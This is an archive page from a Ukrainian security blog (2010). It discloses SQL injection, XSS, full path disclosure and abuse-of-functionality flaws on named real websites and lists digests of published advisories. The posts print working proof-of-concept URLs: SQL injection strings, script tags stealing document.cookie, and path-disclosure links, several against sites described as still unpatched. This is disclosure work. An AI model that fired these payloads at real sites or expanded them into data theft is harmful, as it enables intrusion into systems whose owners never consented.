Архів для категорії 'Уразливості'

Уразливості на feedvalidator.org

23:59 23.09.2010

В серпні, 15.08.2010, я знайшов Abuse of Functionality та Insufficient Anti-automation на сайті http://feedvalidator.org. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти.

Abuse of Functionality:

http://feedvalidator.org/check.cgi?url=http://www.google.com

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сам сайт.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі).

Уразливість на rawfoodsnewsmagazine.com

15:20 23.09.2010

21.01.2010

У травні, 24.05.2009, я знайшов SQL Injection уразливість на сайті http://www.rawfoodsnewsmagazine.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

23.09.2010

SQL Injection:

http://www.rawfoodsnewsmagazine.com/modules.php?op=modload&name=News&file=article&sid=-1%20or%20version()=5

Уразливість досі не виправлена.

Добірка уразливостей

16:12 22.09.2010

В даній добірці уразливості в веб додатках:

  • Joomla BookLibrary Component Four SQL Injection Vulnerabilities (деталі)
  • HP Power Manager “formExportDataLogs” Directory Traversal (деталі)
  • HP Power Manager “formExportDataLogs” Buffer Overflow (деталі)
  • HP Power Manager, Remote Execution of Arbitrary Code (деталі)
  • HP Power Manager, Remote Execution of Arbitrary Code (деталі)
  • Hewlett-Packard Power Manager Administration Web Server Stack Overflow Vulnerability (деталі)
  • HP Power Manager, Remote Execution of Arbitrary Code (деталі)
  • iScripts EasySnaps 2.0 Multiple SQL Injection Vulnerabilities (деталі)
  • iScripts ReserveLogic 1.0 SQL Injection Vulnerability (деталі)
  • iScripts CyberMatch 1.0 Blind SQL Injection Vulnerability (деталі)

Уразливість на webheim.com

15:03 21.09.2010

20.01.2010

У травні, 24.05.2009, я знайшов SQL Injection уразливість на сайті http://webheim.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

21.09.2010

SQL Injection:

http://webheim.com/modules.php?op=modload&name=News&file=article&sid=-1%20or%20version()=3.23

Уразливість досі не виправлена.

Добірка уразливостей

15:04 20.09.2010

В даній добірці уразливості в веб додатках:

  • New libhtml-parser-perl packages fix denial of service (деталі)
  • SQL injection vulnerability in Grafik CMS (деталі)
  • XSS vulnerability in PortalApp (деталі)
  • SQL injection vulnerability in TomatoCMS (деталі)
  • Multiple XSS in TornadoStore 1.4.3 (деталі)
  • Multiple SQL Injection in TornadoStore 1.4.3 (деталі)
  • Harris Stratex StarMAX subscriber station running config CSRF exploit (деталі)
  • SAP’s web module OLK SQL Injection vulnerability (деталі)
  • Cross-site AJAX request vulnerability in Asterisk (деталі)
  • SIP responses expose valid usernames in Asterisk (деталі)

Уразливості на www.museodecera.com.mx

16:02 18.09.2010

18.01.2010

У травні, 18.05.2009, я знайшов SQL Injection, Full path disclosure та Information Leakage уразливості на сайті http://www.museodecera.com.mx. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

18.09.2010

SQL Injection:

http://www.museodecera.com.mx/guestbook/index.php?action=jump&id=-1%20union%20select%20version()

Full path disclosure:

http://www.museodecera.com.mx/guestbook/config.inc.php

Information Leakage:

http://www.museodecera.com.mx/guestbook/index.php

В meta-тегах виводиться інформація про версію PHP, MySQL і веб сервера.

Дані уразливості досі не виправлені.

Добірка уразливостей

15:27 17.09.2010

В даній добірці уразливості в веб додатках:

Нові уразливості на rozetka.com.ua

18:02 16.09.2010

06.01.2010

У травні, 06.05.2009, я знайшов нові уразливості на сайті http://rozetka.com.ua, зокрема Full path disclosure та Cross-Site Scripting (в тому числі persistent XSS). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.allo.ua. Також раніше я вже писав про уразливості на www.rozetka.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.09.2010

Full path disclosure:

http://rozetka.com.ua/index.php?page=search&search_text=%3C%3E

XSS:

http://rozetka.com.ua/index.php?page=search&search_text=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://rozetka.com.ua/search/?text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (single-user persistent XSS):

На сторінках товарів (http://rozetka.com.ua/ru/products/comments/ 6074/index.html) в полях Имя і e-mail, які також зберігаються в кукісі.

XSS (single-user persisted XSS, коли користувач залогінений на сайті):

На сторінці http://rozetka.com.ua/account.php (поля Имя и Фамилия, Email, Адрес строка 1, Адрес строка 2, Город/Поселок, Регион/Область/Район, Почтовый индекс, Ваш телефон) та на кожній зовнішній сторінці сайта (поле Имя).

Дані уразливості вже виправлені шляхом зміни движка.

Добірка уразливостей

15:28 15.09.2010

В даній добірці уразливості в веб додатках:

Уразливості на infoscop.net

15:22 14.09.2010

16.01.2010

У травні, 17.05.2009, я знайшов Cross-Site Scripting та Full path disclosure уразливості на проекті http://infoscop.net (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

14.09.2010

XSS:

А також з будь-якими іншими параметрами окрім “pg” (”a” і т.д.) в скриптах index.php та f_mn.php.

Дані уразливості виправлені, але неякісно, тому при невеликій зміні коду, вони знову працюють.

XSS (з MouseOverJacking):

А також з будь-якими іншими параметрами окрім “pg” (”a” і т.д.) в скриптах index.php та f_mn.php.

Full path disclosure:

http://infoscop.net/index.php?pg=index.php
http://infoscop.net/f_mn.php?pg=f_mn.php
http://infoscop.net/f_inc/f_var_ses.php
http://infoscop.net/f_inc/f_cadm.php
http://infoscop.net/f_inc/f_frm_i.php
http://infoscop.net/f_inc/f_rld.php
http://infoscop.net/f_inc/f_var_db.php

Дані уразливості досі не виправлені.